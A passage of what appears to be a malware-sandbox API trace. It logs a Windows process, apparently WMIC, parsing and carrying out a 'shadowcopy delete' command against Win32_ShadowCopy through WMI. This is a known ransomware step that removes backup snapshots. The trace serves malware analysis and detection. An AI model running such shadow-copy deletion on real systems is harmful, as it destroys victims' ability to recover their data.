_Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0xcf608 | out: _Buffer="08-08-2020T04:50:43") returned 19 [0132.807] lstrlenW (lpString=" shadowcopy delete") returned 19 [0132.807] malloc (_Size=0x28) returned 0x476e80 [0132.807] lstrlenW (lpString=" shadowcopy delete") returned 19 [0132.807] lstrlenW (lpString=" shadowcopy delete") returned 19 [0132.807] malloc (_Size=0x28) returned 0x476eb0 [0132.807] lstrlenW (lpString=" shadowcopy delete") returned 19 [0132.807] lstrlenW (lpString=" shadowcopy delete") returned 19 [0132.807] lstrlenW (lpString=" shadowcopy delete") returned 19 [0132.807] malloc (_Size=0x16) returned 0x47c7f0 [0132.807] lstrlenW (lpString="shadowcopy") returned 10 [0132.807] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0132.807] malloc (_Size=0x16) returned 0x47c810 [0132.807] malloc (_Size=0x8) returned 0x476e10 [0132.807] free (_Block=0x0) [0132.807] free (_Block=0x47c7f0) [0132.807] lstrlenW (lpString=" shadowcopy delete") returned 19 [0132.808] malloc (_Size=0xe) returned 0x47c7f0 [0132.808] lstrlenW (lpString="delete") returned 6 [0132.808] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0132.808] malloc (_Size=0xe) returned 0x47c830 [0132.808] malloc (_Size=0x10) returned 0x47c850 [0132.808] memmove_s (in: _Destination=0x47c850, _DestinationSize=0x8, _Source=0x476e10, _SourceSize=0x8 | out: _Destination=0x47c850) returned 0x0 [0132.808] free (_Block=0x476e10) [0132.808] free (_Block=0x0) [0132.808] free (_Block=0x47c7f0) [0132.808] malloc (_Size=0x10) returned 0x47c7f0 [0132.808] lstrlenW (lpString="QUIT") returned 4 [0132.808] lstrlenW (lpString="shadowcopy") returned 10 [0132.808] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0132.808] lstrlenW (lpString="EXIT") returned 4 [0132.808] lstrlenW (lpString="shadowcopy") returned 10 [0132.808] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0132.808] free (_Block=0x47c7f0) [0132.808] WbemLocator:IUnknown:AddRef (This=0x1ba1390) returned 0x2 [0132.808] malloc (_Size=0x10) returned 0x47c7f0 [0132.808] lstrlenW (lpString="/") returned 1 [0132.808] lstrlenW (lpString="shadowcopy") returned 10 [0132.808] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0132.808] lstrlenW (lpString="-") returned 1 [0132.808] lstrlenW (lpString="shadowcopy") returned 10 [0132.808] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0132.808] lstrlenW (lpString="CLASS") returned 5 [0132.808] lstrlenW (lpString="shadowcopy") returned 10 [0132.808] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0132.808] lstrlenW (lpString="PATH") returned 4 [0132.808] lstrlenW (lpString="shadowcopy") returned 10 [0132.809] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0132.809] lstrlenW (lpString="CONTEXT") returned 7 [0132.809] lstrlenW (lpString="shadowcopy") returned 10 [0132.809] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0132.809] lstrlenW (lpString="shadowcopy") returned 10 [0132.809] malloc (_Size=0x16) returned 0x47c870 [0132.809] lstrlenW (lpString="shadowcopy") returned 10 [0132.810] GetCurrentThreadId () returned 0x2dc [0132.810] ??0CHString@@QEAA@XZ () returned 0xcf4c0 [0132.810] malloc (_Size=0x18) returned 0x47c890 [0132.810] malloc (_Size=0x18) returned 0x47c8b0 [0132.810] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1ba1390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffbf2998 | out: ppNamespace=0xffbf2998*=0x1bb3a98) returned 0x0 [0133.330] free (_Block=0x47c8b0) [0133.330] free (_Block=0x47c890) [0133.330] CoSetProxyBlanket (pProxy=0x1bb3a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0133.331] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0133.331] GetCurrentThreadId () returned 0x2dc [0133.331] ??0CHString@@QEAA@XZ () returned 0xcf358 [0133.331] malloc (_Size=0x18) returned 0x47c890 [0133.331] malloc (_Size=0x18) returned 0x47c8b0 [0133.331] malloc (_Size=0x18) returned 0x47c8d0 [0133.331] malloc (_Size=0x18) returned 0x47c8f0 [0133.331] SysStringLen (param_1="root\\cli") returned 0x8 [0133.331] SysStringLen (param_1="\\") returned 0x1 [0133.331] malloc (_Size=0x18) returned 0x47c910 [0133.331] SysStringLen (param_1="root\\cli\\") returned 0x9 [0133.331] SysStringLen (param_1="ms_409") returned 0x6 [0133.331] free (_Block=0x47c8f0) [0133.331] free (_Block=0x47c8d0) [0133.331] free (_Block=0x47c8b0) [0133.331] free (_Block=0x47c890) [0133.331] malloc (_Size=0x18) returned 0x47c890 [0133.331] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1ba1390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffbf29a0 | out: ppNamespace=0xffbf29a0*=0x1bb3b28) returned 0x0 [0133.343] free (_Block=0x47c890) [0133.343] free (_Block=0x47c910) [0133.343] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0133.343] GetCurrentThreadId () returned 0x2dc [0133.343] ??0CHString@@QEAA@XZ () returned 0xcf4d0 [0133.343] malloc (_Size=0x18) returned 0x47c910 [0133.343] malloc (_Size=0x18) returned 0x47c890 [0133.343] malloc (_Size=0x18) returned 0x47c8b0 [0133.343] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0133.343] malloc (_Size=0x3a) returned 0x47ca40 [0133.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffb81980, cbMultiByte=-1, lpWideCharStr=0x47ca40, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0133.343] free (_Block=0x47ca40) [0133.343] malloc (_Size=0x18) returned 0x47c8d0 [0133.343] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0133.343] SysStringLen (param_1="shadowcopy") returned 0xa [0133.343] malloc (_Size=0x18) returned 0x47c8f0 [0133.343] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0133.343] SysStringLen (param_1="'") returned 0x1 [0133.344] free (_Block=0x47c8d0) [0133.344] free (_Block=0x47c8b0) [0133.344] free (_Block=0x47c890) [0133.344] free (_Block=0x47c910) [0133.344] IWbemServices:GetObject (in: This=0x1bb3a98, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0xcf4d8*=0x0, ppCallResult=0x0 | out: ppObject=0xcf4d8*=0x1bc04e0, ppCallResult=0x0) returned 0x0 [0133.358] malloc (_Size=0x18) returned 0x47c910 [0133.358] IWbemClassObject:Get (in: This=0x1bc04e0, wszName="Target", lFlags=0, pVal=0xcf400*(varType=0x0, wReserved1=0xffbf, wReserved2=0x0, wReserved3=0x0, varVal1=0xffbf2998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf400*(varType=0x8, wReserved1=0xffbf, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0133.358] free (_Block=0x47c910) [0133.358] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0133.358] malloc (_Size=0x3e) returned 0x47ca40 [0133.358] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0133.358] malloc (_Size=0x18) returned 0x47c910 [0133.358] IWbemClassObject:Get (in: This=0x1bc04e0, wszName="PWhere", lFlags=0, pVal=0xcf400*(varType=0x0, wReserved1=0xffbf, wReserved2=0x0, wReserved3=0x0, varVal1=0x26e0e8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf400*(varType=0x8, wReserved1=0xffbf, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0133.358] free (_Block=0x47c910) [0133.358] lstrlenW (lpString=" Where ID = '#'") returned 15 [0133.358] malloc (_Size=0x20) returned 0x47ca90 [0133.358] lstrlenW (lpString=" Where ID = '#'") returned 15 [0133.358] malloc (_Size=0x18) returned 0x47c910 [0133.358] IWbemClassObject:Get (in: This=0x1bc04e0, wszName="Connection", lFlags=0, pVal=0xcf400*(varType=0x0, wReserved1=0xffbf, wReserved2=0x0, wReserved3=0x0, varVal1=0x2bbc28, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf400*(varType=0xd, wReserved1=0xffbf, wReserved2=0x0, wReserved3=0x0, varVal1=0x1bc09c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0133.359] free (_Block=0x47c910) [0133.359] IUnknown:QueryInterface (in: This=0x1bc09c0, riid=0xffb87360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0xcf3f0 | out: ppvObject=0xcf3f0*=0x1bc09c0) returned 0x0 [0133.359] GetCurrentThreadId () returned 0x2dc [0133.359] ??0CHString@@QEAA@XZ () returned 0xcf318 [0133.359] malloc (_Size=0x18) returned 0x47c910 [0133.359] IWbemClassObject:Get (in: This=0x1bc09c0, wszName="Namespace", lFlags=0, pVal=0xcf340*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffb9738f, varVal2=0x47c910), pType=0x0, plFlavor=0x0 | out: pVal=0xcf340*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x47c910), pType=0x0, plFlavor=0x0) returned 0x0 [0133.359] free (_Block=0x47c910) [0133.359] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0133.359] malloc (_Size=0x16) returned 0x47c910 [0133.359] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0133.359] malloc (_Size=0x18) returned 0x47c890 [0133.359] IWbemClassObject:Get (in: This=0x1bc09c0, wszName="Locale", lFlags=0, pVal=0xcf340*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ec318, varVal2=0x47c910), pType=0x0, plFlavor=0x0 | out: pVal=0xcf340*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x47c910), pType=0x0, plFlavor=0x0) returned 0x0 [0133.359] free (_Block=0x47c890) [0133.359] lstrlenW (lpString="ms_409") returned 6 [0133.359] malloc (_Size=0xe) returned 0x47c890 [0133.359] lstrlenW (lpString="ms_409") returned 6 [0133.359] malloc (_Size=0x18) returned 0x47c8b0 [0133.359] IWbemClassObject:Get (in: This=0x1bc09c0, wszName="User", lFlags=0, pVal=0xcf340*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ec318, varVal2=0x47c910), pType=0x0, plFlavor=0x0 | out: pVal=0xcf340*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ec318, varVal2=0x47c910), pType=0x0, plFlavor=0x0) returned 0x0 [0133.359] free (_Block=0x47c8b0) [0133.359] malloc (_Size=0x18) returned 0x47c8b0 [0133.359] IWbemClassObject:Get (in: This=0x1bc09c0, wszName="Password", lFlags=0, pVal=0xcf340*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ec318, varVal2=0x47c910), pType=0x0, plFlavor=0x0 | out: pVal=0xcf340*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ec318, varVal2=0x47c910), pType=0x0, plFlavor=0x0) returned 0x0 [0133.360] free (_Block=0x47c8b0) [0133.360] malloc (_Size=0x18) returned 0x47c8b0 [0133.360] IWbemClassObject:Get (in: This=0x1bc09c0, wszName="Server", lFlags=0, pVal=0xcf340*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ec318, varVal2=0x47c910), pType=0x0, plFlavor=0x0 | out: pVal=0xcf340*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x47c910), pType=0x0, plFlavor=0x0) returned 0x0 [0133.360] free (_Block=0x47c8b0) [0133.360] lstrlenW (lpString=".") returned 1 [0133.360] malloc (_Size=0x4) returned 0x476e10 [0133.360] lstrlenW (lpString=".") returned 1 [0133.360] malloc (_Size=0x18) returned 0x47c8b0 [0133.360] IWbemClassObject:Get (in: This=0x1bc09c0, wszName="Authority", lFlags=0, pVal=0xcf340*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ec318, varVal2=0x47c910), pType=0x0, plFlavor=0x0 | out: pVal=0xcf340*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ec318, varVal2=0x47c910), pType=0x0, plFlavor=0x0) returned 0x0 [0133.360] free (_Block=0x47c8b0) [0133.360] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0133.360] IUnknown:Release (This=0x1bc09c0) returned 0x1 [0133.360] GetCurrentThreadId () returned 0x2dc [0133.360] ??0CHString@@QEAA@XZ () returned 0xcf318 [0133.360] malloc (_Size=0x18) returned 0x47c8b0 [0133.360] IWbemClassObject:Get (in: This=0x1bc04e0, wszName="__RELPATH", lFlags=0, pVal=0xcf340*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ec318, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0xcf340*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0133.360] free (_Block=0x47c8b0) [0133.360] malloc (_Size=0x18) returned 0x47c8b0 [0133.361] GetCurrentThreadId () returned 0x2dc [0133.361] ??0CHString@@QEAA@XZ () returned 0xcf198 [0133.361] ??0CHString@@QEAA@PEBG@Z () returned 0xcf1b0 [0133.361] ??0CHString@@QEAA@AEBV0@@Z () returned 0xcf140 [0133.361] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0133.361] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x47cac0 [0133.361] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0133.361] ?Left@CHString@@QEBA?AV1@H@Z () returned 0xcf100 [0133.362] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0xcf148 [0133.362] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0xcf1b0 [0133.362] ??1CHString@@QEAA@XZ () returned 0x25745f01 [0133.362] ??1CHString@@QEAA@XZ () returned 0x25745f01 [0133.362] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0xcf108 [0133.362] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0xcf140 [0133.362] ??1CHString@@QEAA@XZ () returned 0x1 [0133.362] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x47cb30 [0133.362] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0133.362] ?Left@CHString@@QEBA?AV1@H@Z () returned 0xcf100 [0133.362] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0xcf148 [0133.362] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0xcf1b0 [0133.362] ??1CHString@@QEAA@XZ () returned 0x25745f01 [0133.362] ??1CHString@@QEAA@XZ () returned 0x25745f01 [0133.362] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0xcf108 [0133.362] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0xcf140 [0133.362] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0133.362] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef4af4820 [0133.362] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0133.362] malloc (_Size=0x18) returned 0x47c8d0 [0133.362] malloc (_Size=0x18) returned 0x47c930 [0133.362] malloc (_Size=0x18) returned 0x47c950 [0133.362] malloc (_Size=0x18) returned 0x47c970 [0133.362] malloc (_Size=0x18) returned 0x47c990 [0133.362] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0133.362] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0133.362] malloc (_Size=0x18) returned 0x47c9b0 [0133.362] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0133.363] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0133.363] malloc (_Size=0x18) returned 0x47c9d0 [0133.363] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0133.363] SysStringLen (param_1="\"") returned 0x1 [0133.363] free (_Block=0x47c9b0) [0133.363] free (_Block=0x47c990) [0133.363] free (_Block=0x47c970) [0133.363] free (_Block=0x47c950) [0133.363] free (_Block=0x47c930) [0133.363] free (_Block=0x47c8d0) [0133.363] IWbemServices:GetObject (in: This=0x1bb3b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0xcf188*=0x0, ppCallResult=0x0 | out: ppObject=0xcf188*=0x1bc0a50, ppCallResult=0x0) returned 0x0 [0133.366] malloc (_Size=0x18) returned 0x47c8d0 [0133.366] IWbemClassObject:Get (in: This=0x1bc0a50, wszName="Text", lFlags=0, pVal=0xcf1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffbf2ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0xcf1c0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2e6770*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x26de80, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0133.366] free (_Block=0x47c8d0) [0133.366] SafeArrayGetLBound (in: psa=0x2e6770, nDim=0x1, plLbound=0xcf1a0 | out: plLbound=0xcf1a0) returned 0x0 [0133.366] SafeArrayGetUBound (in: psa=0x2e6770, nDim=0x1, plUbound=0xcf190 | out: plUbound=0xcf190) returned 0x0 [0133.366] SafeArrayGetElement (in: psa=0x2e6770, rgIndices=0xcf184, pv=0xcf1d8 | out: pv=0xcf1d8) returned 0x0 [0133.366] malloc (_Size=0x18) returned 0x47c8d0 [0133.366] malloc (_Size=0x18) returned 0x47c930 [0133.366] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0133.366] free (_Block=0x47c8d0) [0133.366] IUnknown:Release (This=0x1bc0a50) returned 0x0 [0133.366] free (_Block=0x47c9d0) [0133.366] ??1CHString@@QEAA@XZ () returned 0x25745f01 [0133.366] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0133.367] free (_Block=0x47c8b0) [0133.367] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0133.367] lstrlenW (lpString="Shadow copy management.") returned 23 [0133.367] malloc (_Size=0x30) returned 0x478600 [0133.367] lstrlenW (lpString="Shadow copy management.") returned 23 [0133.367] free (_Block=0x47c930) [0133.367] IUnknown:Release (This=0x1bc04e0) returned 0x0 [0133.367] free (_Block=0x47c8f0) [0133.367] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0133.367] lstrlenW (lpString="PATH") returned 4 [0133.367] lstrlenW (lpString="delete") returned 6 [0133.367] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="PATH", cchCount2=4) returned 1 [0133.367] lstrlenW (lpString="WHERE") returned 5 [0133.367] lstrlenW (lpString="delete") returned 6 [0133.367] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="WHERE", cchCount2=5) returned 1 [0133.367] lstrlenW (lpString="(") returned 1 [0133.367] lstrlenW (lpString="delete") returned 6 [0133.367] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="(", cchCount2=1) returned 3 [0133.367] lstrlenW (lpString="/") returned 1 [0133.367] lstrlenW (lpString="delete") returned 6 [0133.367] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0133.367] lstrlenW (lpString="-") returned 1 [0133.367] lstrlenW (lpString="delete") returned 6 [0133.367] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0133.367] malloc (_Size=0x18) returned 0x47c8f0 [0133.367] lstrlenW (lpString="GET") returned 3 [0133.367] lstrlenW (lpString="delete") returned 6 [0133.367] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0133.368] lstrlenW (lpString="LIST") returned 4 [0133.368] lstrlenW (lpString="delete") returned 6 [0133.368] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0133.368] lstrlenW (lpString="SET") returned 3 [0133.368] lstrlenW (lpString="delete") returned 6 [0133.368] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0133.368] lstrlenW (lpString="CREATE") returned 6 [0133.368] lstrlenW (lpString="delete") returned 6 [0133.368] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0133.368] lstrlenW (lpString="CALL") returned 4 [0133.368] lstrlenW (lpString="delete") returned 6 [0133.368] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0133.368] lstrlenW (lpString="ASSOC") returned 5 [0133.368] lstrlenW (lpString="delete") returned 6 [0133.368] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0133.368] lstrlenW (lpString="DELETE") returned 6 [0133.368] lstrlenW (lpString="delete") returned 6 [0133.368] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0133.368] free (_Block=0x47c8f0) [0133.368] lstrlenW (lpString="/") returned 1 [0133.368] lstrlenW (lpString="delete") returned 6 [0133.368] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0133.368] lstrlenW (lpString="-") returned 1 [0133.368] lstrlenW (lpString="delete") returned 6 [0133.368] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0133.368] lstrlenW (lpString="delete") returned 6 [0133.368] malloc (_Size=0xe) returned 0x47c8f0 [0133.368] lstrlenW (lpString="delete") returned 6 [0133.368] lstrlenW (lpString="GET") returned 3 [0133.368] lstrlenW (lpString="delete") returned 6 [0133.368] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0133.368] lstrlenW (lpString="LIST") returned 4 [0133.369] lstrlenW (lpString="delete") returned 6 [0133.369] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0133.369] lstrlenW (lpString="SET") returned 3 [0133.369] lstrlenW (lpString="delete") returned 6 [0133.369] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0133.369] lstrlenW (lpString="CREATE") returned 6 [0133.369] lstrlenW (lpString="delete") returned 6 [0133.369] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0133.369] lstrlenW (lpString="CALL") returned 4 [0133.369] lstrlenW (lpString="delete") returned 6 [0133.369] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0133.369] lstrlenW (lpString="ASSOC") returned 5 [0133.369] lstrlenW (lpString="delete") returned 6 [0133.369] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0133.369] lstrlenW (lpString="DELETE") returned 6 [0133.369] lstrlenW (lpString="delete") returned 6 [0133.369] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0133.369] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0133.369] malloc (_Size=0x3e) returned 0x47cac0 [0133.369] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0133.369] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff80 | out: _String="Select", _Context=0xffffffffffffff80) returned="Select" [0133.369] malloc (_Size=0x18) returned 0x47c930 [0133.369] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0133.369] lstrlenW (lpString="FROM") returned 4 [0133.369] lstrlenW (lpString="*") returned 1 [0133.369] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0133.369] malloc (_Size=0x18) returned 0x47c8b0 [0133.369] free (_Block=0x47c930) [0133.370] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x53007f00780008 | out: _String=0x0, _Context=0x53007f00780008) returned="from" [0133.370] lstrlenW (lpString="FROM") returned 4 [0133.370] lstrlenW (lpString="from") returned 4 [0133.370] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0133.370] malloc (_Size=0x18) returned 0x47c930 [0133.370] free (_Block=0x47c8b0) [0133.370] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x53008000780008 | out: _String=0x0, _Context=0x53008000780008) returned="Win32_ShadowCopy" [0133.370] malloc (_Size=0x18) returned 0x47c8b0 [0133.370] free (_Block=0x47c930) [0133.370] free (_Block=0x47cac0) [0133.370] free (_Block=0x47c8b0) [0133.370] lstrlenW (lpString="SET") returned 3 [0133.370] lstrlenW (lpString="delete") returned 6 [0133.370] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0133.370] lstrlenW (lpString="CREATE") returned 6 [0133.370] lstrlenW (lpString="delete") returned 6 [0133.370] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0133.370] free (_Block=0x47c7f0) [0133.370] malloc (_Size=0x8) returned 0x47cac0 [0133.370] lstrlenW (lpString="GET") returned 3 [0133.370] lstrlenW (lpString="delete") returned 6 [0133.370] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0133.370] lstrlenW (lpString="LIST") returned 4 [0133.370] lstrlenW (lpString="delete") returned 6 [0133.370] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0133.370] lstrlenW (lpString="ASSOC") returned 5 [0133.370] lstrlenW (lpString="delete") returned 6 [0133.370] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0133.370] WbemLocator:IUnknown:AddRef (This=0x1ba1390) returned 0x3 [0133.370] free (_Block=0x14dfb0) [0133.370] lstrlenW (lpString="") returned 0 [0133.370] lstrlenW (lpString="XDUWTFONO") returned 9 [0133.370] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0133.371] lstrlenW (lpString="XDUWTFONO") returned 9 